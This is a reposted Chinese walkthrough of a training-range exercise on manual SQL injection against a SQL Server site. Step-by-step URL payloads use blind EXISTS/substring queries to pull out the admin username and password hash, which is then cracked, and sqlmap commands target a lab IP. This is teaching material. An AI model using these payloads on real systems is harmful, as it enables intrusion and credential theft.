墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)

转载于：https://blog.csdn.net/qq_42357070/article/details/81239721

手工SQL注入过程，数据库执行的语句，是页面提交至服务器应用程序，应用程序获取id的值，然后把值拼接到查询语句中，在到数据库中查询，通过程序解析后，把结果返回在页面上，（使用时请将mozhe.cn替换成对应的靶场地址）。

开启靶场环境：

第1步：

页面提交：http://mozhe.cn/new_list.php?id=2
数据库执行语句：select * from manage where id=2
页面返回描述：返回内容正常
分析解说：正常浏览页面，找到有参数的地方，如id。

第2步：

页面提交：http://mozhe.cn/new_list.php?id=2-0
数据库执行语句：select * from manage where id=2-0
页面返回描述：返回内容正常
分析解说：测试SQL语句。

第3步：

页面提交：http://mozhe.cn/new_list.php?id=2-1
数据库执行语句：select * from manage where id=2-1
页面返回描述：返回内容为错误页面
分析解说：因为sql语句中，2-1不等于2，所以结果不成立。

第4步：

页面提交：http://mozhe.cn/new_list.php?id=2 order by 1
数据库执行语句：select * from manage where id=2 order by 1
页面返回描述：返回内容正常
分析解说：通过SQL语句中order by N 来判断有几个字段，返回内容正常，可以确定至少有1个字段。

第5步：

页面提交：http://mozhe.cn/new_list.php?id=2 order by 10
数据库执行语句：select * from manage where id=2 order by 10
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中order by N 来判断有几个字段，返回内容不正常，说明字段数少于10个。

第6步：

页面提交：http://mozhe.cn/new_list.php?id=2 order by 5
数据库执行语句：select * from manage where id=2 order by 5
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中order by N 来判断有几个字段，返回内容不正常，说明字段数少于5个。

第7步：

页面提交：http://mozhe.cn/new_list.php?id=2 order by 4
数据库执行语句：select * from manage where id=2 order by 4
页面返回描述：返回内容正常
分析解说：通过SQL语句中order by N 来判断有几个字段，返回内容正常，可以确定有4个字段。

第8步：

页面提交：http://mozhe.cn/new_list.php?id=2 and 1=2 union select 1,2,3,4
数据库执行语句：select * from manage where id=2 and 1=2 union select 1,2,3,4
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中and 1=2 union select 1,2,3……,n联合查询，判断显示的是哪些字段，就是原本显示标题和内容时候的查询字段。此处返回的是错误页面，说明系统禁止使用union进行相关SQL查询，我们得使用其他方式进行手工SQL注入。

第9步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists(select * from admin)
数据库执行语句：select * from manage where id=2 and exists(select * from admin)
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中的and exists(select * from admin)查询，判断数据库中存在哪些数据库表。此处返回错误页面，说明系统不存在admin数据库表。

第10步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists(select * from manage)
数据库执行语句：select * from manage where id=2 and exists(select * from manage)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的and exists(select * from manage)查询，判断数据库中存在哪些数据库表。此处返回正常页面，说明系统存在manage数据库表。

第11步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists(select username from manage)
数据库执行语句：select * from manage where id=2 and exists(select username from manage)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的and exists(select username from manage)查询，判断manage数据库表表中存在的字段。此处返回内容为正常页面，说明数据库表中存在username字段。

第12步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists(select password from manage)
数据库执行语句：select * from manage where id=2 and exists(select password from manage)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的and exists(select password from manage)查询，判断manage数据库表表中存在的字段。此处返回内容为正常页面，说明数据库表中存在password字段。

第13步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists(select id from manage)
数据库执行语句：select * from manage where id=2 and exists(select id from manage)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的and exists(select id from manage)查询，判断manage数据库表表中存在的字段。此处返回内容为正常页面，说明数据库表中存在id字段。

第14步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists(select id from manage)查询，判断manage数据库表表中ID为1是否存在数据。此处返回内容为正常页面，说明数据库表中ID为1是存在的。

第15步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where len(username)=1 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where len(username)=1 and ID=1)
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where len(username)=1 and ID=1)查询，判断manage数据库表表中id=1的usrname字段值的长度。此处返回内容为错误页面，说明数据库表中ID=1的username字段值的长度大于1。得知username长度大于1后，依次尝试2，3，4…N，直至返回页面如第16步所示。

第16步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where len(username)=8 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where len(username)=8 and ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where len(username)=8 and ID=1)查询，判断manage数据库表表中id=1的usrname字段值的长度。此处返回内容为正常页面，说明数据库表中ID=1的username字段值的长度等于8。

第17步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where len(password)=1 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where len(password)=1 and ID=1)
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where len(password)=1 and ID=1)查询，判断manage数据库表表中id=1的password字段值的长度。此处返回内容为错误页面，说明数据库表中ID=1的password字段值的长度大于1。得知password长度大于1后，依次尝试2，3，4，5…N（或者直接使用MD5后的字符串长度），直至返回页面如第18步所示。

第18步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where len(password)=16 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where len(password)=16 and ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where len(password)=16 and ID=1)查询，判断manage数据库表表中id=1的password字段值的长度。此处返回内容为正常页面，说明数据库表中ID=1的password字段值的长度等于16。

第19步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,1,1))=65 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where unicode(substring(username,1,1))=65 and ID=1)
页面返回描述：返回内容为错误页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where unicode(substring(username,1,1))=65 and ID=1)查询，判断manage数据库表表中id=1的username字段值的第一位字符。此处返回内容为错误页面，说明数据库表中ID=1的username字段值的第一位不等于‘A’。关于ASC码的转码，请自行补习功课。

第20步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,1,1))=97 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where unicode(substring(username,1,1))=97 and ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where unicode(substring(username,1,1))=97 and ID=1)查询，判断manage数据库表表中id=1的username字段值的第一位字符。此处返回内容为正常页面，说明数据库表中ID=1的username字段值的第一位等于‘a’。

第21步：

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)查询，判断manage数据库表表中id=1的username字段值的第一位字符。此处返回内容为正常页面，说明数据库表中ID=1的username字段值的第一位等于‘d’。

第22步：

使用第19至第21步的方法，分别提交以下URL请求，即可得到id=1的username字段的值。
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,3,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,4,1))=105 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,5,1))=110 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,6,1))=95 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,7,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,8,1))=122 and ID=1)
最后得到的username值是：admin_mz

第23步：

利用注入username字段值的方法对password字段进行注入，分别提交以下URL请求，即可得到id=1的password字段的值。
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,1,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,2,1))=50 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,3,1))=101 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,4,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,5,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,6,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,7,1))=99 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,8,1))=51 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,9,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,10,1))=48 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,11,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,12,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,13,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,14,1))=53 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,15,1))=56 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,16,1))=51 and ID=1)
最后得到的password值是：72e1bfc3f01b7583
不过该password值为明文password MD5加密后的值，通过MD5解密网站得知明文password值为97285101，最后成功登录系统。

可以用sqlmap按顺序跑出库名、表名、列名，但跑出的内容则为null
得当前数据库名：
sqlmap.py -u http://219.153.49.228:43790/new_list.asp?id=2 --current-db
得数据表名：
sqlmap.py -u http://219.153.49.228:43790/new_list.asp?id=2 --tables -D"数据库名"
得表中列名：
sqlmap.py -u http://219.153.49.228:43790/new_list.asp?id=2 --columns -T"数据表名" -D"数据库名"
想得其中内容：（发现值为username和password都为null）
sqlmap.py -u http://219.153.49.228:43790/new_list.asp?id=2 --columns -T"数据表名" -D"数据库名" --dump
接着就手动注入吧。

可用 --purge 去缓存
可用 --flush 刷新
转自墨者学院本题下-finally‘wirteup